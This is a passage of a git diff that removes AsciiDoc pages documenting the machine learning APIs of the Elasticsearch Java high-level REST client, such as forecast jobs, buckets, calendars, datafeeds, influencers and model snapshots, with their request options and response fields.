calculate interim results (requires `calc_interim` to be `true`) -<5> Set the skip time to skip a particular time value - -[id="{upid}-{api}-response"] -==== Flush jobs response - -A +{response}+ contains an acknowledgement and an optional end date for the -last finalized bucket - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isFlushed()` indicates if the job was successfully flushed or not. -<2> `getLastFinalizedBucketEnd()` provides the timestamp -(in milliseconds-since-the-epoch) of the end of the last bucket that was processed. 
- -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/forecast-job.asciidoc b/docs/java-rest/high-level/ml/forecast-job.asciidoc deleted file mode 100644 index 3cd4a263c5c..00000000000 --- a/docs/java-rest/high-level/ml/forecast-job.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ --- -:api: forecast-job -:request: ForecastJobRequest -:response: ForecastJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Forecast jobs API - -Forecasts a {ml} job's behavior based on historical data. It accepts a -+{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Forecast jobs request - -A +{request}+ object gets created with an existing non-null `jobId`. -All other fields are optional for the request. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId` - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Set when the forecast for the job should expire -<2> Set how far into the future should the forecast predict -<3> Set the maximum amount of memory the forecast is allowed to use. - Defaults to 20mb. Maximum is 500mb, minimum is 1mb. If set to - 40% or more of the job's configured memory limit, it is - automatically reduced to below that number. - -[id="{upid}-{api}-response"] -==== Forecast jobs response - -A +{response}+ contains an acknowledgement and the forecast ID - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isAcknowledged()` indicates if the forecast was successful -<2> `getForecastId()` provides the ID of the forecast that was created - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/get-buckets.asciidoc b/docs/java-rest/high-level/ml/get-buckets.asciidoc deleted file mode 100644 index 14c9406969e..00000000000 --- a/docs/java-rest/high-level/ml/get-buckets.asciidoc +++ /dev/null @@ -1,95 +0,0 @@ --- -:api: get-buckets -:request: GetBucketsRequest -:response: GetBucketsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get buckets API - -Retrieves one or more bucket results. -It accepts a +{request}+ object and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get buckets request - -A +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId`. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-timestamp] --------------------------------------------------- -<1> The timestamp of the bucket to get. Otherwise it will return all buckets. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-anomaly-score] --------------------------------------------------- -<1> Buckets with anomaly scores greater or equal than this value will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-desc] --------------------------------------------------- -<1> If `true`, the buckets are sorted in descending order. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-end] --------------------------------------------------- -<1> Buckets with timestamps earlier than this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-exclude-interim] --------------------------------------------------- -<1> If `true`, interim results will be excluded. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-expand] --------------------------------------------------- -<1> If `true`, buckets will include their anomaly records. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of buckets to skip. -`size` specifies the maximum number of buckets to get. Defaults to `0` and `100` respectively. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-sort] --------------------------------------------------- -<1> The field to sort buckets on. Defaults to `timestamp`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-start] --------------------------------------------------- -<1> Buckets with timestamps on or after this time will be returned. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get buckets response - -The returned +{response}+ contains the requested buckets: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of buckets that were matched. -<2> The buckets retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-calendar-events.asciidoc b/docs/java-rest/high-level/ml/get-calendar-events.asciidoc deleted file mode 100644 index 0a687517431..00000000000 --- a/docs/java-rest/high-level/ml/get-calendar-events.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ --- -:api: get-calendar-events -:request: GetCalendarEventsRequest -:response: GetCalendarEventsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get calendar events API - -Retrieves a calendar's events. -It accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get calendar events request - -A +{request}+ requires a non-null calendar ID. 
-Using the literal `_all` returns the events for all calendars. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request for the specified calendarId. - -==== Optional arguments -The following arguments are optional: - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of events to skip. -`size` specifies the maximum number of events to get. Defaults to `0` and `100` respectively. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-start] --------------------------------------------------- -<1> Specifies to get events with timestamps after this time. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-end] --------------------------------------------------- -<1> Specifies to get events with timestamps earlier than this time. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-jobid] --------------------------------------------------- -<1> Get events for the job. When this option is used calendar_id must be `_all`. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get calendar events response - -The returned +{response}+ contains the requested events: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of events that were matched. -<2> The events retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-calendars.asciidoc b/docs/java-rest/high-level/ml/get-calendars.asciidoc deleted file mode 100644 index a2e30ce9394..00000000000 --- a/docs/java-rest/high-level/ml/get-calendars.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ --- -:api: get-calendars -:request: GetCalendarsRequest -:response: GetCalendarsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get calendars API - -Retrieves one or more calendar objects. -It accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get calendars request - -By default, a +{request}+ with no calendar ID set will return all -calendars. Using the literal `_all` also returns all calendars. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request for all calendars. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-id] --------------------------------------------------- -<1> Construct a request for the single calendar `holidays`. 
- - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -calendars to skip. `size` specifies the maximum number of calendars to get. -Defaults to `0` and `100` respectively. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get calendars response - -The returned +{response}+ contains the requested calendars: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of calendars that were matched. -<2> The calendars retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-categories.asciidoc b/docs/java-rest/high-level/ml/get-categories.asciidoc deleted file mode 100644 index bcb5ed89253..00000000000 --- a/docs/java-rest/high-level/ml/get-categories.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ --- -:api: get-categories -:request: GetCategoriesRequest -:response: GetCategoriesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get categories API - -Retrieves one or more category results. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get categories request - -A +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId`. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-category-id] --------------------------------------------------- -<1> The ID of the category to get. Otherwise, it will return all categories. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -categories to skip. `size` specifies the maximum number of categories to get. -Defaults to `0` and `100` respectively. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get categories response - -The returned +{response}+ contains the requested categories: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of categories that were matched. -<2> The categories retrieved. 
\ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-data-frame-analytics-stats.asciidoc b/docs/java-rest/high-level/ml/get-data-frame-analytics-stats.asciidoc deleted file mode 100644 index 98fa1815478..00000000000 --- a/docs/java-rest/high-level/ml/get-data-frame-analytics-stats.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: get-data-frame-analytics-stats -:request: GetDataFrameAnalyticsStatsRequest -:response: GetDataFrameAnalyticsStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get {dfanalytics-jobs} stats API - -experimental::[] - -Retrieves the operational statistics of one or more {dfanalytics-jobs}. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Get {dfanalytics-jobs} stats request - -A +{request}+ requires either a {dfanalytics-job} ID, a comma-separated list of -IDs, or the special wildcard `_all` to get the statistics for all -{dfanalytics-jobs}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new GET stats request referencing an existing -{dfanalytics-job} - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the requested {dfanalytics-job} statistics. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/get-data-frame-analytics.asciidoc deleted file mode 100644 index 20684c0d020..00000000000 --- a/docs/java-rest/high-level/ml/get-data-frame-analytics.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ --- -:api: get-data-frame-analytics -:request: GetDataFrameAnalyticsRequest -:response: GetDataFrameAnalyticsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get {dfanalytics-jobs} API - -experimental::[] - -Retrieves one or more {dfanalytics-jobs}. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Get {dfanalytics-jobs} request - -A +{request}+ requires either a {dfanalytics-job} ID, a comma-separated list of -IDs, or the special wildcard `_all` to get all {dfanalytics-jobs}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new GET request referencing an existing {dfanalytics-job} - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the requested {dfanalytics-jobs}. 
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
--------------------------------------------------
diff --git a/docs/java-rest/high-level/ml/get-datafeed-stats.asciidoc b/docs/java-rest/high-level/ml/get-datafeed-stats.asciidoc
deleted file mode 100644
index 16055098162..00000000000
--- a/docs/java-rest/high-level/ml/get-datafeed-stats.asciidoc
+++ /dev/null
@@ -1,40 +0,0 @@
--
-:api: get-datafeed-stats
-:request: GetDatafeedStatsRequest
-:response: GetDatafeedStatsResponse
---
-[role="xpack"]
-[id="{upid}-{api}"]
-=== Get datafeed stats API
-
-Retrieves any number of {ml} datafeeds' statistics in the cluster.
-It accepts a +{request}+ object and responds with a +{response}+ object.
-
-[id="{upid}-{api}-request"]
-==== Get datafeed stats request
-
-A +{request}+ object can have any number of `datafeedId` entries. However, they
-all must be non-null. An empty list is the same as requesting statistics for all
-datafeeds.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-<1> Constructing a new request referencing existing `datafeedIds`. It can
-contain wildcards.
-<2> Whether to ignore if a wildcard expression matches no datafeeds.
- (This includes `_all` string or when no datafeeds have been specified).
-
-include::../execution.asciidoc[]
-
-[id="{upid}-{api}-response"]
-==== Get datafeed stats response
-The returned +{response}+ contains the requested datafeed statistics:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
--------------------------------------------------
-<1> `count()` indicates the number of datafeed statistics found.
-<2> `datafeedStats()` is the collection of {ml} `DatafeedStats` objects found.
\ No newline at end of file
diff --git a/docs/java-rest/high-level/ml/get-datafeed.asciidoc b/docs/java-rest/high-level/ml/get-datafeed.asciidoc
deleted file mode 100644
index a0ca8f29756..00000000000
--- a/docs/java-rest/high-level/ml/get-datafeed.asciidoc
+++ /dev/null
@@ -1,39 +0,0 @@
--
-:api: get-datafeed
-:request: GetDatafeedRequest
-:response: GetDatafeedResponse
---
-[role="xpack"]
-[id="{upid}-{api}"]
-=== Get datafeeds API
-
-Retrieves configuration information about {ml} datafeeds in the cluster.
-It accepts a +{request}+ object and responds with a +{response}+ object.
-
-[id="{upid}-{api}-request"]
-==== Get datafeeds request
-
-A +{request}+ object can have any number of `datafeedId` entries. However,
-they all must be non-null. An empty list is the same as requesting all
-datafeeds.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-<1> Constructing a new request referencing existing `datafeedIds`. It can
-contain wildcards.
-<2> Whether to ignore if a wildcard expression matches no datafeeds.
- (This includes `_all` string or when no datafeeds have been specified).
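
As an illustration of the request described above (not taken from the tagged snippets), a hypothetical helper might look like the following. The varargs constructor mirrors the callouts; the name of the "allow no match" setter has changed across client versions, so treat it as a placeholder.

[source,java]
--------------------------------------------------
import java.io.IOException;

import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;
import org.elasticsearch.client.ml.GetDatafeedRequest;
import org.elasticsearch.client.ml.GetDatafeedResponse;

// Illustrative sketch: wildcard patterns and explicit IDs can be mixed freely.
static GetDatafeedResponse getDatafeeds(RestHighLevelClient client) throws IOException {
    GetDatafeedRequest request = new GetDatafeedRequest("datafeed-1", "datafeed-logs-*");
    request.setAllowNoMatch(true); // tolerate wildcards that match nothing (setter name is an assumption)
    return client.machineLearning().getDatafeed(request, RequestOptions.DEFAULT);
}
--------------------------------------------------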
- -[id="{upid}-{api}-response"] -==== Get datafeeds response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of retrieved datafeeds. -<2> The retrieved datafeeds. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/get-filters.asciidoc b/docs/java-rest/high-level/ml/get-filters.asciidoc deleted file mode 100644 index 5d33e1e2d19..00000000000 --- a/docs/java-rest/high-level/ml/get-filters.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ --- -:api: get-filters -:request: GetFiltersRequest -:response: GetFiltersResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get filters API - -Retrieves one or more filter results. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get filters request - -A +{request}+ object gets created. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-filter-id] --------------------------------------------------- -<1> The ID of the filter to get. Otherwise, it will return all filters. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page-params] --------------------------------------------------- -<1> `from` specifies the number of filters to skip. Defaults to `0`. -<2> `size` specifies the maximum number of filters to get. Defaults to `100`. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get filters response - -The returned +{response}+ contains the requested filters: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of filters that were matched. -<2> The filters retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-influencers.asciidoc b/docs/java-rest/high-level/ml/get-influencers.asciidoc deleted file mode 100644 index 9096a103911..00000000000 --- a/docs/java-rest/high-level/ml/get-influencers.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ --- -:api: get-influencers -:request: GetInfluencersRequest -:response: GetInfluencersResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get influencers API - -Retrieves one or more influencer results. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get influencers request - -A +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId`. 
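
To make the flow concrete, a minimal hypothetical sketch of building and executing the request is shown here; only the non-null job ID is required, and the optional filters described next can be layered on top. Method names other than the request constructor are assumptions.

[source,java]
--------------------------------------------------
import java.io.IOException;

import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;
import org.elasticsearch.client.ml.GetInfluencersRequest;
import org.elasticsearch.client.ml.GetInfluencersResponse;

// Illustrative sketch: only the job ID is mandatory.
static GetInfluencersResponse getInfluencers(RestHighLevelClient client, String jobId) throws IOException {
    GetInfluencersRequest request = new GetInfluencersRequest(jobId);
    // Optional filters (time range, score threshold, sorting, paging) are described below.
    return client.machineLearning().getInfluencers(request, RequestOptions.DEFAULT);
}
--------------------------------------------------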
- -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-desc] --------------------------------------------------- -<1> If `true`, the influencers are sorted in descending order. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-end] --------------------------------------------------- -<1> Influencers with timestamps earlier than this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-exclude-interim] --------------------------------------------------- -<1> If `true`, interim results will be excluded. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-influencer-score] --------------------------------------------------- -<1> Influencers with `influencer_score` greater than or equal to this value will -be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -influencers to skip. `size` specifies the maximum number of influencers to get. -Defaults to `0` and `100` respectively. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-sort] --------------------------------------------------- -<1> The field to sort influencers on. Defaults to `influencer_score`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-start] --------------------------------------------------- -<1> Influencers with timestamps on or after this time will be returned. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get influencers response - -The returned +{response}+ contains the requested influencers: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of influencers that were matched. -<2> The influencers retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-info.asciidoc b/docs/java-rest/high-level/ml/get-info.asciidoc deleted file mode 100644 index 662a007f293..00000000000 --- a/docs/java-rest/high-level/ml/get-info.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: get-ml-info -:request: MlInfoRequest -:response: MlInfoResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get {ml} info API - -Provides defaults and limits used internally by {ml}. -These may be useful to a user interface that needs to interpret machine learning -configurations where certain fields are missing because the end user was happy -with the default value. - -It accepts a +{request}+ object and responds with a +{response}+ object. 
-
-[id="{upid}-{api}-request"]
-==== Get {ml} info request
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-<1> Constructing a new request.
-
-[id="{upid}-{api}-response"]
-==== Get {ml} info response
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
--------------------------------------------------
-<1> `info` from the +{response}+ contains {ml} info details.
-
-include::../execution.asciidoc[]
diff --git a/docs/java-rest/high-level/ml/get-job-stats.asciidoc b/docs/java-rest/high-level/ml/get-job-stats.asciidoc
deleted file mode 100644
index cc391cace7f..00000000000
--- a/docs/java-rest/high-level/ml/get-job-stats.asciidoc
+++ /dev/null
@@ -1,40 +0,0 @@
--
-:api: get-job-stats
-:request: GetJobStatsRequest
-:response: GetJobStatsResponse
---
-[role="xpack"]
-[id="{upid}-{api}"]
-=== Get {anomaly-job} stats API
-
-Retrieves statistics for any number of {anomaly-jobs} in the cluster.
-It accepts a +{request}+ object and responds with a +{response}+ object.
-
-[id="{upid}-{api}-request"]
-==== Get {anomaly-job} stats request
-
-A `GetJobStatsRequest` object can have any number of `jobId`
-entries. However, they all must be non-null. An empty list is the same as
-requesting statistics for all {anomaly-jobs}.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-<1> Constructing a new request referencing existing `jobIds`. It can contain
-wildcards.
-<2> Whether to ignore if a wildcard expression matches no {anomaly-jobs}.
- (This includes `_all` string or when no jobs have been specified).
-
-include::../execution.asciidoc[]
-
-[id="{upid}-{api}-response"]
-==== Get {anomaly-job} stats response
-The returned +{response}+ contains the requested job statistics:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
--------------------------------------------------
-<1> `getCount()` indicates the number of job statistics found.
-<2> `getJobStats()` is the collection of {ml} `JobStats` objects found.
\ No newline at end of file
diff --git a/docs/java-rest/high-level/ml/get-job.asciidoc b/docs/java-rest/high-level/ml/get-job.asciidoc
deleted file mode 100644
index 3fde9b98f31..00000000000
--- a/docs/java-rest/high-level/ml/get-job.asciidoc
+++ /dev/null
@@ -1,39 +0,0 @@
--
-:api: get-job
-:request: GetJobRequest
-:response: GetJobResponse
---
-[role="xpack"]
-[id="{upid}-{api}"]
-=== Get {anomaly-jobs} API
-
-Retrieves configuration information for {anomaly-jobs} in the cluster.
-It accepts a +{request}+ object and responds with a +{response}+ object.
-
-[id="{upid}-{api}-request"]
-==== Get {anomaly-jobs} request
-
-A +{request}+ object can have any number of `jobId` or `groupName`
-entries. However, they all must be non-null. An empty list is the same as
-requesting all {anomaly-jobs}.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-<1> Constructing a new request referencing existing `jobIds`.
It can contain -wildcards. -<2> Whether to ignore if a wildcard expression matches no {anomaly-jobs}. - (This includes `_all` string or when no jobs have been specified). - -[id="{upid}-{api}-response"] -==== Get {anomaly-jobs} response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `getCount()` from the +{response}+ indicates the number of jobs found. -<2> `getJobs()` is the collection of {ml} `Job` objects found. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/get-model-snapshots.asciidoc b/docs/java-rest/high-level/ml/get-model-snapshots.asciidoc deleted file mode 100644 index d0cc7a3887f..00000000000 --- a/docs/java-rest/high-level/ml/get-model-snapshots.asciidoc +++ /dev/null @@ -1,77 +0,0 @@ --- -:api: get-model-snapshots -:request: GetModelSnapshotsRequest -:response: GetModelSnapshotsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get model snapshots API - -Retrieves one or more model snapshot results. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get model snapshots request - -A +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId`. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-snapshot-id] --------------------------------------------------- -<1> The ID of the snapshot to get. Otherwise, it will return all snapshots. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-desc] --------------------------------------------------- -<1> If `true`, the snapshots are sorted in descending order. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-end] --------------------------------------------------- -<1> Snapshots with timestamps earlier than this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-sort] --------------------------------------------------- -<1> The field to sort snapshots on. Defaults to `timestamp`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-start] --------------------------------------------------- -<1> Snapshots with timestamps on or after this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -snapshots to skip. `size` specifies the maximum number of snapshots to retrieve. -Defaults to `0` and `100` respectively. 
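
Putting a few of these options together, a hypothetical request for the most recent snapshots might look like the sketch below. The setter and helper names are assumptions based on the callouts above, not verified signatures.

[source,java]
--------------------------------------------------
import java.io.IOException;

import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;
import org.elasticsearch.client.ml.GetModelSnapshotsRequest;
import org.elasticsearch.client.ml.GetModelSnapshotsResponse;
import org.elasticsearch.client.ml.job.util.PageParams;

// Illustrative sketch: newest snapshots first, limited to one page of ten.
static GetModelSnapshotsResponse newestSnapshots(RestHighLevelClient client, String jobId) throws IOException {
    GetModelSnapshotsRequest request = new GetModelSnapshotsRequest(jobId);
    request.setSort("timestamp");                 // sort field (assumed setter)
    request.setDesc(true);                        // descending order (assumed setter)
    request.setPageParams(new PageParams(0, 10)); // from/size paging (assumed helper)
    return client.machineLearning().getModelSnapshots(request, RequestOptions.DEFAULT);
}
--------------------------------------------------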
- -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get model snapshots response - -The returned +{response}+ contains the requested snapshots: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of snapshots that were matched. -<2> The snapshots retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-overall-buckets.asciidoc b/docs/java-rest/high-level/ml/get-overall-buckets.asciidoc deleted file mode 100644 index 4fd7b806345..00000000000 --- a/docs/java-rest/high-level/ml/get-overall-buckets.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ --- -:api: get-overall-buckets -:request: GetOverallBucketsRequest -:response: GetOverallBucketsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get overall buckets API - -Retrieves overall bucket results that summarize the bucket results of multiple -{anomaly-jobs}. -It accepts a +{request}+ object and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get overall buckets request - -A +{request}+ object gets created with one or more `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing job IDs `jobId1` and `jobId2`. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-bucket-span] --------------------------------------------------- -<1> The span of the overall buckets. Must be greater or equal to the jobs' -largest `bucket_span`. - -["source","java",subs="attributes,callouts,macros"] 